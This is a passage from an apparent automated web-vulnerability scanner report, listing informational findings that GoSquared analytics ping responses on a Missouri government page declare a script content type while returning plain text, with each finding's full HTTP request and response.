Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.68. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5360172654036433/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5360172654036433/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5360172654036433/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:41:39 GMT
Expires: Tue, 05 Apr 2011 11:41:39
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.69. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5386203117668629/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5386203117668629/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5386203117668629/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:29:12 GMT
Expires: Tue, 05 Apr 2011 11:29:12
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.70. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5455857384949923/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5455857384949923/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5455857384949923/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:52:43 GMT
Expires: Tue, 05 Apr 2011 11:52:43
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.71. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5471443922724575/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5471443922724575/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5471443922724575/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:47:44 GMT
Expires: Tue, 05 Apr 2011 11:47:44
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.72. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5550143918953836/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5550143918953836/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5550143918953836/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:54:39 GMT
Expires: Tue, 05 Apr 2011 11:54:39
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.73. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5863302680663764/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5863302680663764/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5863302680663764/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:43:34 GMT
Expires: Tue, 05 Apr 2011 11:43:34
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.74. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.594650394981727/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.594650394981727/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.594650394981727/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:48:51 GMT
Expires: Tue, 05 Apr 2011 11:48:51
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.75. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.5956144810188562/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.5956144810188562/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.5956144810188562/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:54:06 GMT
Expires: Tue, 05 Apr 2011 11:54:06
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.76. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6021819114685059/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6021819114685059/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6021819114685059/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:56:36 GMT
Expires: Tue, 05 Apr 2011 11:56:36
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.77. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6179129627998918/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6179129627998918/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6179129627998918/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:49:57 GMT
Expires: Tue, 05 Apr 2011 11:49:57
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.78. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6373290235642344/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6373290235642344/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6373290235642344/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:38:36 GMT
Expires: Tue, 05 Apr 2011 11:38:36
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.79. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6486031790263951/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6486031790263951/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6486031790263951/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:49:24 GMT
Expires: Tue, 05 Apr 2011 11:49:24
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.80. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6607160025741905/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6607160025741905/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6607160025741905/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:37:29 GMT
Expires: Tue, 05 Apr 2011 11:37:29
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.81. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6617095449473709/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6617095449473709/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6617095449473709/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:38:03 GMT
Expires: Tue, 05 Apr 2011 11:38:03
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.82. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6921457799617201/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6921457799617201/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6921457799617201/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:46:55 GMT
Expires: Tue, 05 Apr 2011 11:46:55
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.83. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6926347883418202/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6926347883418202/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6926347883418202/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:26:59 GMT
Expires: Tue, 05 Apr 2011 11:26:59
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.84. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.6938011264428496/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.6938011264428496/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.6938011264428496/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:29:45 GMT
Expires: Tue, 05 Apr 2011 11:29:45
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.85. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7019346773158759/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7019346773158759/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7019346773158759/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:38:20 GMT
Expires: Tue, 05 Apr 2011 11:38:20
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.86. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.715909109916538/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.715909109916538/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.715909109916538/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:53:33 GMT
Expires: Tue, 05 Apr 2011 11:53:33
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.87. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7213846454396844/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7213846454396844/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7213846454396844/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:47:28 GMT
Expires: Tue, 05 Apr 2011 11:47:28
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.88. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7216604244895279/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7216604244895279/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7216604244895279/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:53:00 GMT
Expires: Tue, 05 Apr 2011 11:53:00
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.89. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7247910390142351/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7247910390142351/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7247910390142351/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:36:23 GMT
Expires: Tue, 05 Apr 2011 11:36:23
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.90. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7289540111087263/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7289540111087263/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7289540111087263/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:37:47 GMT
Expires: Tue, 05 Apr 2011 11:37:47
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.91. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7393709721509367/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7393709721509367/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7393709721509367/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:31:25 GMT
Expires: Tue, 05 Apr 2011 11:31:24
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.92. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.7429176256991923/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.7429176256991923/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.7429176256991923/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:46:38 GMT
Expires: Tue, 05 Apr 2011 11:46:38
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

